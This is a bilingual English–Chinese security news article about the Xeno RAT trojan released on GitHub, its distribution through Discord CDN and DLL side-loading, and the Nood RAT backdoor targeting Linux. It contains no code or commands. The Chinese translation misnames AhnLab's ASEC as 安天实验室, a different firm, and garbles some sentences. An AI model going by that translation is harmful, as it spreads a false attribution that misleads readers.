GitHub上新崛起的Xeno RAT木马

An "intricately designed" remote access trojan (RAT) called Xeno RAT has been made available on GitHub, making it available to other actors at no extra cost.

一种名为Xeno RAT的"精心设计的"远程访问特洛伊木马（RAT）已经在GitHub上开放，使其可以无需额外费用提供给其他行为者。

Written in C# and compatible with Windows 10 and Windows 11 operating systems, the open-source RAT comes with a "comprehensive set of features for remote system management," according to its developer, who goes by the name moom825.

用C#编写，与Windows 10和Windows 11操作系统兼容的开源RAT具有"全面的远程系统管理功能集合"，根据其开发人员moom825的说法。

It includes a SOCKS5 reverse proxy and the ability to record real-time audio, as well as incorporate a hidden virtual network computing (hVNC) module along the lines of DarkVNC, which allows attackers to gain remote access to an infected computer.

它包括一个SOCKS5反向代理和录制实时音频的功能，以及一个类似DarkVNC的隐藏虚拟网络计算（hVNC）模块，允许攻击者远程访问被感染的计算机。

"Xeno RAT is developed entirely from scratch, ensuring a unique and tailored approach to remote access tools," the developer states in the project description. Another notable aspect is that it has a builder that enables the creation of bespoke variants of the malware.

开发人员在项目描述中表示:"Xeno RAT完全从头开始开发，确保对远程访问工具采用独特和定制的方法"。另一个值得注意的方面是它具有一个构建器，可以创建定制变种的恶意软件。

It's worth noting that the moom825 is also the developer of another C#-based RAT called DiscordRAT 2.0, which has been distributed by threat actors within a malicious npm package named node-hide-console-windows, as disclosed by ReversingLabs in October 2023.

值得一提的是，moom825还是另一种基于C#的名为DiscordRAT 2.0的RAT的开发人员，这个RAT已经通过恶意npm软件包node-hide-console-Windows的形式分发给威胁行为者，正如ReversingLabs在2023年10月披露的那样。

Cybersecurity firm Cyfirma, in a report published last week, said it observed Xeno RAT being disseminated via the Discord content delivery network (CDN), once again underscoring how a rise in affordable and freely available malware is driving an increase in campaigns utilizing RATs.

网络安全公司Cyfirma在上周发布的一份报告中表示，他们观察到Xeno RAT通过Discord内容传送网络（CDN）传播，再次强调了廉价且免费可用的恶意软件的增加正推动利用RAT的活动增加。

"The primary vector in the form of a shortcut file, disguised as a WhatsApp screenshot, acts as a downloader," the company said. "The downloader downloads the ZIP archive from Discord CDN, extracts, and executes the next stage payload."

"WhatsApp截图"的形式，作为下载器的主要载体，充当一个快捷方式文件，该公司表示。"下载器从Discord CDN下载ZIP存档文件，提取并执行下一个阶段的有效负载。"

The multi-stage sequence leverages a technique called DLL side-loading to launch a malicious DLL, while simultaneously taking steps to establish persistence and evade analysis and detection.

这个多阶段序列利用一种称为DLL侧加载的技术来启动恶意DLL，同时采取措施确立持久性并逃避分析和检测。

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed the use of a Gh0st RAT variant called Nood RAT that's used in attacks targeting Linux systems, allowing adversaries to harvest sensitive information.

随着安天实验室安全情报中心（ASEC）披露使用一种名为Nood RAT的Gh0st RAT变种，该变种用于针对Linux系统的攻击，允许对手收集敏感信息的情况。

"Nood RAT is a backdoor malware that can receive commands from the C&C server to perform malicious activities such as downloading malicious files, stealing systems' internal files, and executing commands," ASEC said.

"Nood RAT是一种后门恶意软件，可以从C&C服务器接收命令执行恶意活动，例如下载恶意文件，窃取系统内部文件和执行命令，"ASEC表示。

"Although simple in form, it is equipped with the encryption feature to avoid network packet detection and can receive commands from threat actors to carry out multiple malicious activities."

"虽然形式简单，但它配备了加密功能以避免网络数据包检测，并可以从威胁行为者接收命令执行多个恶意活动。

原文始发于微信公众号（知机安全）：GitHub上新崛起的Xeno RAT木马